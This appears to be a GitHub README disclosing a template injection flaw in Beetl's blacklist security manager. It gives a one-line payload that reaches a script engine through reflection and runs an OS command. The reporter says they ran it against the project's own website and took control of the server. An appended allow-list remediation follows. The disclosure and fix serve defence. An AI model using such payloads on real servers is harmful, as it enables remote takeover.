luelueking/Beetl-3.15.0-vuln-poc

Latest commit: March 31, 2023 10:22
Beetl-3.15.0-vuln-poc

Beetl has an SSTI (server-side template injection) vulnerability in every version up to and including the latest one.

  • The security manager's policy is implemented as a blacklist

package org.beetl.core;

// Beetl's default native-call security manager: only four java.lang classes are
// denied; every other class, including java.lang.reflect and javax.script, is allowed.
public class DefaultNativeSecurityManager implements NativeSecurityManager {

    @Override
    public boolean permit(String resourceId, Class c, Object target, String method) {
        if (c.isArray()) {
            // Allowed here; the subsequent call on the array will fail anyway. Not handled by this class.
            return true;
        }
        String name = c.getSimpleName();
        String pkg = c.getPackage().getName();
        if (pkg.startsWith("java.lang")) {
            if (name.equals("Runtime") || name.equals("Process") || name.equals("ProcessBuilder")
                    || name.equals("System")) {
                return false;
            }
        }
        return true;
    }
}
  • Using reflection (java.lang.reflect) bypasses every policy in the blacklist

  • PoC

${@Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("s='open -a Calculator';java.lang.Runtime.getRuntime().exec(s);")}

(screenshot: ilOcbN.png)

  • Taking the official website as an example, I entered the following payload, purely for testing

(screenshot: ilbloa.png)

  • and successfully obtained control of the server

(screenshot: ilbpyZ.png)

Remediation suggestions

  • Restrict reflection (java.lang.reflect)
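The blacklist shown above fails because it names four classes and allows everything else, so the template only has to reach Class.forName to get anywhere it likes. The example below is an added illustration of the remediation bullet, written for this page; it is not code from the luelueking/Beetl-3.15.0-vuln-poc repository or from Beetl itself. It inverts the policy into an allow-list: a template may call into a fixed set of packages, a few classes inside those packages (Class, ClassLoader, Runtime, ...) are denied explicitly, and reflection-style methods are denied on any receiver. It assumes Beetl's org.beetl.core.NativeSecurityManager interface with the permit(String, Class, Object, String) signature shown on this page; the package name example, the class name AllowListNativeSecurityManager, the contents of the allow-list, and the assumption that the manager is wired in with groupTemplate.setNativeSecurity(manager) are all choices made for this example, not part of the page.

```java
package example;

import java.util.Set;

import org.beetl.core.NativeSecurityManager;

/**
 * Allow-list NativeSecurityManager (added example, not Beetl's own code).
 * Instead of naming a few forbidden classes, it names the packages a template
 * may call into and denies everything else, so java.lang.reflect, javax.script
 * and class-loading entry points are unreachable from a template expression.
 */
public class AllowListNativeSecurityManager implements NativeSecurityManager {

    // Packages a template may call natively. Matched exactly, so "java.lang" does
    // not implicitly allow "java.lang.reflect" the way a startsWith() check would.
    private static final Set<String> ALLOWED_PACKAGES = Set.of(
            "java.lang", "java.util", "java.time", "java.math", "java.text");

    // Classes inside an allowed package that must still be denied: each one lets a
    // template load classes, spawn processes or reach the JVM itself.
    private static final Set<String> DENIED_CLASSES = Set.of(
            "java.lang.Class", "java.lang.ClassLoader", "java.lang.Runtime",
            "java.lang.Process", "java.lang.ProcessBuilder", "java.lang.System",
            "java.lang.Thread", "java.lang.Module");

    // Methods denied on any receiver: they hand back a Class, ClassLoader or
    // Method from an otherwise harmless object, which is the first step of the
    // reflection bypass described on this page.
    private static final Set<String> DENIED_METHODS = Set.of(
            "forName", "getClass", "getClassLoader", "newInstance", "getMethod",
            "getDeclaredMethod", "getConstructor", "getDeclaredConstructor", "invoke");

    @Override
    public boolean permit(String resourceId, Class c, Object target, String method) {
        if (c == null || method == null) {
            return false;
        }
        // Unwrap arrays and judge the element type; primitives (int, char, ...) are harmless.
        Class<?> k = c;
        while (k.isArray()) {
            k = k.getComponentType();
        }
        if (k.isPrimitive()) {
            return true;
        }
        if (DENIED_METHODS.contains(method)) {
            return false;
        }
        if (DENIED_CLASSES.contains(k.getName())) {
            return false;
        }
        // Default deny: anything outside the allow-list (javax.script, java.lang.reflect,
        // application classes, ...) is refused without having to be named.
        Package pkg = k.getPackage();
        String pkgName = (pkg == null) ? "" : pkg.getName();
        return ALLOWED_PACKAGES.contains(pkgName);
    }

    // Stand-alone self-check using constructed calls (not captured from Beetl).
    // Wiring the manager into Beetl is assumed to be groupTemplate.setNativeSecurity(manager).
    public static void main(String[] args) {
        AllowListNativeSecurityManager m = new AllowListNativeSecurityManager();
        expect(false, m.permit("t.btl", Class.class, null, "forName"));          // @Class.forName(...)
        expect(false, m.permit("t.btl", javax.script.ScriptEngineManager.class, null, "getEngineByName"));
        expect(false, m.permit("t.btl", java.lang.reflect.Method.class, null, "invoke"));
        expect(false, m.permit("t.btl", String.class, "x", "getClass"));         // "x".getClass()
        expect(true, m.permit("t.btl", String.class, "x", "toUpperCase"));       // ordinary call
        expect(true, m.permit("t.btl", java.util.ArrayList.class, null, "size"));
        expect(true, m.permit("t.btl", int[].class, new int[0], "clone"));       // primitive array
        System.out.println("all permit decisions as expected");
    }

    private static void expect(boolean expected, boolean actual) {
        if (expected != actual) {
            throw new IllegalStateException("unexpected permit decision");
        }
    }
}
```

Two points to check when adopting something like this: the exact-match allow-list means sub-packages such as java.util.concurrent have to be added deliberately, and the method deny-list only cuts off the reflective entry points, so the package allow-list is the control that actually matters. Run the template suite against the new manager before deploying it, since an allow-list will also refuse calls that were legitimately relied on.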

Reporter

@luelueking
